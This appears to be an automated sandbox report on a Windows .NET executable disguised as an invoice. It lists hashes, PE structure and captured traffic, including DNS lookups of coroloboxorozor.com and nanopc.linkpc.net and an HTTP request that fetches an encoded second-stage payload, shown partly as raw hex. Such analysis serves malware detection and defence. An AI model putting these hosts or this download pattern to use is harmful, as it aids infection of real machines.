                                                                                                                                                            SHA1:e463d219a1d4dbde375e4f53c2fc250d6ee9d7f1
                                                                                                                                                            SHA256:a0ebcb3078763eb8acca534831ef9ca1a213347328698aa3cda7c5bd23cd81d8
                                                                                                                                                            SHA512:6d13f052bc55d278b3d6a2b0ddd286572d9e45e96fbb8f52f64847b5c93b4e7c21edcbd2e42ccd096a660c86e1bafec84dd45c41195fa0c3533ae1bd1e82d9ca
                                                                                                                                                            SSDEEP:1536:OQEpTCImp9zO6/XSTwtPo55rKrFUcDOC53bzf01l:OQJta6/XQIFNMl
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..n............... ........@.. ..............................4.....@................................

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:68c6a6ce96b28acc

                                                                                                                                                            Static PE Info

                                                                                                                                                            General

                                                                                                                                                            Entrypoint:0x408c1e
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:true
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                            Time Stamp:0x8AB4D40F [Tue Sep 29 02:29:35 2043 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:v4.0.30319
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                            Authenticode Signature

                                                                                                                                                            Signature Valid:
                                                                                                                                                            Signature Issuer:
                                                                                                                                                            Signature Validation Error:
                                                                                                                                                            Error Number:
                                                                                                                                                            Not Before, Not After
                                                                                                                                                              Subject Chain
                                                                                                                                                                Version:
                                                                                                                                                                Thumbprint MD5:
                                                                                                                                                                Thumbprint SHA-1:
                                                                                                                                                                Thumbprint SHA-256:
                                                                                                                                                                Serial:

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the remaining bytes of the preview are zero padding, which the disassembler renders as repeated "add byte ptr [eax], al"; the entry stub is the usual .NET loader thunk that jumps through the IAT entry at RVA 0x2000 to the single import, mscoree.dll!_CorExeMain)

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x8bc4           0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa000           0x2b588       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x7600           0x18d0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x36000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

(The SECURITY entry holds a raw file offset rather than an RVA, so it maps to no section; its 0x18d0 bytes are an attached certificate/Authenticode blob.)

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
.text   0x2000           0x6c24        0x6e00    False     0.569140625      data       6.79874313495    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0xa000           0x2b588       0x2b600   False     0.209018146614   data       5.11613599297    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x36000          0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name           RVA      Size     Type                                                                                                                                   Language  Country
RT_ICON        0xa268   0x3751   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON        0xd9bc   0x10828  dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON        0x1e1e4  0x94a8   data
RT_ICON        0x2768c  0x5488   data
RT_ICON        0x2cb14  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 4286513152
RT_ICON        0x30d3c  0x25a8   data
RT_ICON        0x332e4  0x10a8   data
RT_ICON        0x3438c  0x988    data
RT_ICON        0x34d14  0x468    GLS_BINARY_LSB_FIRST
RT_GROUP_ICON  0x3517c  0x84     data
RT_VERSION     0x35200  0x388    data                                                                                                                                   English   United States

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
LegalCopyright    Copyright 2022 KRJLJBgt. All rights reserved.
Assembly Version  2.1.1.0
InternalName      WgjnHXED.exe
FileVersion       6.1.7.5
CompanyName       UoiZpnTq
LegalTrademarks   WOAkEmIy
Comments          HzWOHjaz
ProductName       WgjnHXED
ProductVersion    2.1.1.0
FileDescription   EsCOzVNx
OriginalFilename  WgjnHXED.exe
Translation       0x0409 0x0514

Possible Origin

Language of compilation system  Country where language is spoken
English                         United States

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID  Message                                        Source Port  Dest Port  Source IP    Dest IP
02/22/21-07:46:08.953744  ICMP      402  ICMP Destination Unreachable Port Unreachable                          192.168.2.5  8.8.8.8

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Feb 22, 2021 07:45:11.793998003 CET  49715        80         192.168.2.5    104.21.71.230
Feb 22, 2021 07:45:11.842531919 CET  80           49715      104.21.71.230  192.168.2.5
Feb 22, 2021 07:45:11.846292019 CET  49715        80         192.168.2.5    104.21.71.230
Feb 22, 2021 07:45:11.848449945 CET  49715        80         192.168.2.5    104.21.71.230
Feb 22, 2021 07:45:11.895890951 CET  80           49715      104.21.71.230  192.168.2.5
Feb 22, 2021 07:45:11.936095953 CET  80           49715      104.21.71.230  192.168.2.5
Feb 22, 2021 07:45:11.936125040 CET  80           49715      104.21.71.230  192.168.2.5
Feb 22, 2021 07:45:11.936142921 CET  80           49715      104.21.71.230  192.168.2.5
Feb 22, 2021 07:45:11.936156034 CET  80           49715      104.21.71.230  192.168.2.5
Feb 22, 2021 07:45:11.936171055 CET  80           49715      104.21.71.230  192.168.2.5
Feb 22, 2021 07:45:11.936191082 CET  80           49715      104.21.71.230  192.168.2.5
Feb 22, 2021 07:45:11.936222076 CET  80           49715      104.21.71.230  192.168.2.5
Feb 22, 2021 07:45:11.936239958 CET  80           49715      104.21.71.230  192.168.2.5
Feb 22, 2021 07:45:11.936244965 CET  49715        80         192.168.2.5    104.21.71.230
Feb 22, 2021 07:45:11.936253071 CET  80           49715      104.21.71.230  192.168.2.5
Feb 22, 2021 07:45:11.936270952 CET  80           49715      104.21.71.230  192.168.2.5
Feb 22, 2021 07:45:11.936302900 CET  49715        80         192.168.2.5    104.21.71.230
Feb 22, 2021 07:45:11.936331987 CET  49715        80         192.168.2.5    104.21.71.230
Feb 22, 2021 07:45:11.937458038 CET  80           49715      104.21.71.230  192.168.2.5
Feb 22, 2021 07:45:11.937479019 CET  80           49715      104.21.71.230  192.168.2.5
Feb 22, 2021 07:45:11.937566042 CET  49715        80         192.168.2.5    104.21.71.230
Feb 22, 2021 07:45:11.938664913 CET  80           49715      104.21.71.230  192.168.2.5
Feb 22, 2021 07:45:11.938683987 CET  80           49715      104.21.71.230  192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.938755035 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.939884901 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.939903975 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.939977884 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.941148996 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.941168070 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.941394091 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.942347050 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.942368031 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.942471027 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.943555117 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.943578005 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.943675041 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.944773912 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.944794893 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.944883108 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.946001053 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.946021080 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.946131945 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.947248936 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.947268009 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.947340965 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.948430061 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.948451042 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.949225903 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.983365059 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.983387947 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.983474970 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.984009027 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.984028101 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.984107018 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.985220909 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.985240936 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.985347033 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.986469030 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.986490011 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.986612082 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.987646103 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.987665892 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.987770081 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.988883972 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.989492893 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.989516020 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.989593983 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.990787029 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.990806103 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.990874052 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.991934061 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.991952896 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.992037058 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.993166924 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.993189096 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.993376017 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.994384050 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.994410992 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.994533062 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.995600939 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.995642900 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.995759010 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.996803999 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.996829987 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.996916056 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.998044968 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.998073101 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.998131990 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.999262094 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.999283075 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.999356031 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.000473022 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.000495911 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.000590086 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.001709938 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.001735926 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.001804113 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.002914906 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.003146887 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.003513098 CET8049715104.21.71.230192.168.2.5

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 22, 2021 07:45:02.118830919 CET | 53 | 53784 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:02.181114912 CET | 65307 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:02.232723951 CET | 53 | 65307 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:02.349119902 CET | 64344 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:02.397936106 CET | 53 | 64344 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:02.537466049 CET | 62060 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:02.586035967 CET | 53 | 62060 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:02.664633036 CET | 61805 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:02.713480949 CET | 53 | 61805 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:03.584505081 CET | 54795 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:03.633208990 CET | 53 | 54795 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:04.609817028 CET | 49557 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:04.658499956 CET | 53 | 49557 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:05.121041059 CET | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:05.180919886 CET | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:05.790483952 CET | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:05.842108011 CET | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:07.234590054 CET | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:07.291798115 CET | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:08.266211987 CET | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:08.315078974 CET | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:09.406626940 CET | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:09.458101988 CET | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:10.355716944 CET | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:10.415628910 CET | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:11.514427900 CET | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:11.564491034 CET | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:11.702461004 CET | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:11.767849922 CET | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:12.791641951 CET | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:12.843056917 CET | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:13.845206976 CET | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:13.896873951 CET | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:30.793107033 CET | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:30.862266064 CET | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:41.328336954 CET | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:41.377043009 CET | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:49.873044968 CET | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:49.932672977 CET | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:55.986865044 CET | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:56.156891108 CET | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:58.192152977 CET | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:58.242141008 CET | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:45:59.086158991 CET | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:45:59.144161940 CET | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:46:06.905451059 CET | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:46:07.897929907 CET | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:46:08.899308920 CET | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:46:08.899494886 CET | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:46:08.902038097 CET | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:46:08.953583002 CET | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:46:16.488347054 CET | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:46:16.548158884 CET | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:46:35.256659031 CET | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:46:35.316206932 CET | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:46:40.067873955 CET | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:46:40.125920057 CET | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:46:41.144453049 CET | 53813 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:46:41.193178892 CET | 53 | 53813 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:47:06.997857094 CET | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:47:07.056972027 CET | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Feb 22, 2021 07:47:18.077564001 CET | 57344 | 53 | 192.168.2.5 | 8.8.8.8
Feb 22, 2021 07:47:18.126307011 CET | 53 | 57344 | 8.8.8.8 | 192.168.2.5

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum/Code | Type
Feb 22, 2021 07:46:08.953743935 CET | 192.168.2.5 | 8.8.8.8 | d023(Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 22, 2021 07:45:11.702461004 CET | 192.168.2.5 | 8.8.8.8 | 0x7b22 | Standard query (0) | coroloboxorozor.com | A (IP address) | IN (0x0001)
Feb 22, 2021 07:45:49.873044968 CET | 192.168.2.5 | 8.8.8.8 | 0xd165 | Standard query (0) | coroloboxorozor.com | A (IP address) | IN (0x0001)
Feb 22, 2021 07:45:55.986865044 CET | 192.168.2.5 | 8.8.8.8 | 0xda85 | Standard query (0) | nanopc.linkpc.net | A (IP address) | IN (0x0001)
Feb 22, 2021 07:45:59.086158991 CET | 192.168.2.5 | 8.8.8.8 | 0x58bc | Standard query (0) | coroloboxorozor.com | A (IP address) | IN (0x0001)
Feb 22, 2021 07:46:16.488347054 CET | 192.168.2.5 | 8.8.8.8 | 0x55a7 | Standard query (0) | nanopc.linkpc.net | A (IP address) | IN (0x0001)
Feb 22, 2021 07:46:35.256659031 CET | 192.168.2.5 | 8.8.8.8 | 0x604 | Standard query (0) | nanopc.linkpc.net | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 22, 2021 07:45:11.767849922 CET | 8.8.8.8 | 192.168.2.5 | 0x7b22 | No error (0) | coroloboxorozor.com | - | 104.21.71.230 | A (IP address) | IN (0x0001)
Feb 22, 2021 07:45:11.767849922 CET | 8.8.8.8 | 192.168.2.5 | 0x7b22 | No error (0) | coroloboxorozor.com | - | 172.67.172.17 | A (IP address) | IN (0x0001)
Feb 22, 2021 07:45:49.932672977 CET | 8.8.8.8 | 192.168.2.5 | 0xd165 | No error (0) | coroloboxorozor.com | - | 104.21.71.230 | A (IP address) | IN (0x0001)
Feb 22, 2021 07:45:49.932672977 CET | 8.8.8.8 | 192.168.2.5 | 0xd165 | No error (0) | coroloboxorozor.com | - | 172.67.172.17 | A (IP address) | IN (0x0001)
Feb 22, 2021 07:45:56.156891108 CET | 8.8.8.8 | 192.168.2.5 | 0xda85 | No error (0) | nanopc.linkpc.net | - | 185.192.70.170 | A (IP address) | IN (0x0001)
Feb 22, 2021 07:45:59.144161940 CET | 8.8.8.8 | 192.168.2.5 | 0x58bc | No error (0) | coroloboxorozor.com | - | 104.21.71.230 | A (IP address) | IN (0x0001)
Feb 22, 2021 07:45:59.144161940 CET | 8.8.8.8 | 192.168.2.5 | 0x58bc | No error (0) | coroloboxorozor.com | - | 172.67.172.17 | A (IP address) | IN (0x0001)
Feb 22, 2021 07:46:16.548158884 CET | 8.8.8.8 | 192.168.2.5 | 0x55a7 | No error (0) | nanopc.linkpc.net | - | 185.192.70.170 | A (IP address) | IN (0x0001)
Feb 22, 2021 07:46:35.316206932 CET | 8.8.8.8 | 192.168.2.5 | 0x604 | No error (0) | nanopc.linkpc.net | - | 185.192.70.170 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• coroloboxorozor.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49715 | 104.21.71.230 | 80 | C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 07:45:11.848449945 CET | 1334 | OUT | GET /base/751448401274A413C5FF91CCBC4EFF60.html HTTP/1.1
Host: coroloboxorozor.com
Connection: Keep-Alive
Feb 22, 2021 07:45:11.936095953 CET | 1340 | IN | HTTP/1.1 200 OK
Date: Mon, 22 Feb 2021 06:45:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=de71cb413ca8922d89186c4e8c29823c11613976311; expires=Wed, 24-Mar-21 06:45:11 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
last-modified: Mon, 22 Feb 2021 04:01:34 GMT
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 086a15304e00001e9510b80000000001
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WQGIjvoHm3lc8ZTRyCpmYeXwtAEivKKTgEO%2BEnmm1j1dVtMYmaqq0OXLHoIngZVovDqANivjhJ9RnBp4R%2BKCYIm0HpUhtr5gpwfLN%2BH4kX3MGsVx"}]}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 6256be2d4b851e95-AMS
                                                                                                                                                                Data Raw: 36 62 38 64 0d 0a 3c 70 3e 47 47 68 4d 46 68 75 74 74 68 46 68 4c 68 46 68 46 68 46 68 74 68 46 68 46 68 46 68 4b 54 54 68 4b 54 54 68 46 68 46 68 75 52 74 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 6a 74 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 75 4b 52 68 46 68 46 68 46 68 75 74 68 4c 75 68 75 52 6a 68 75 74 68 46 68 75 52 46 68 4d 68 4b 46 54 68 4c 4c 68 75 52 74 68 75 68 47 6a 68 4b 46 54 68 4c 4c 68 52 74 68 75 46 74 68 75 46 54 68 75 75 54 68 4c 4b 68 75 75 4b 68 75 75 74 68 75 75 75 68 75 46 4c 68 75 75 74 68 4d 47 68 75 46 4d 68 4c 4b 68 4d 4d 68 4d 47 68 75 75 46 68 75 75 46 68 75 75 75 68 75 75 6a 68 4c 4b 68 4d 52 68 75 46 75 68 4c 4b 68 75 75 74 68 75 75 47 68 75 75 46 68 4c 4b 68 75 46 54 68 75 75 46 68 4c 4b 68 6a 52 68 47 4d 68 52 4c 68 4c 4b 68 75 46 4d 68 75 75 75 68 75 46 46 68 75 46 75 68 74 6a 68 75 4c 68 75 4c 68 75 46 68 4c 6a 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 52 46 68 6a 4d 68 46 68 46 68 47 6a 68 75 68 4c 68 46 68 47 6a 68 75 74 4b 68 74 75 68 75 52 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 4b 4b 74 68 46 68 4c 74 68 46 68 75 75 68 75 68 52 46 68 46 68 46 68 75 46 46 68 75 46 68 46 68 46 68 6a 68 46 68 46 68 46 68 46 68 46 68 46 68 75 4d 46 68 75 4c 75 68 75 46 68 46 68 46 68 4c 4b 68 46 68 46 68 46 68 75 6a 46 68 75 46 68 46 68 46 68 46 68 46 68 75 4b 52 68 46 68 4c 4b 68 46 68 46 68 46 68 4b 68 46 68 46 68 74 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 74 68 46 68 46 68 46
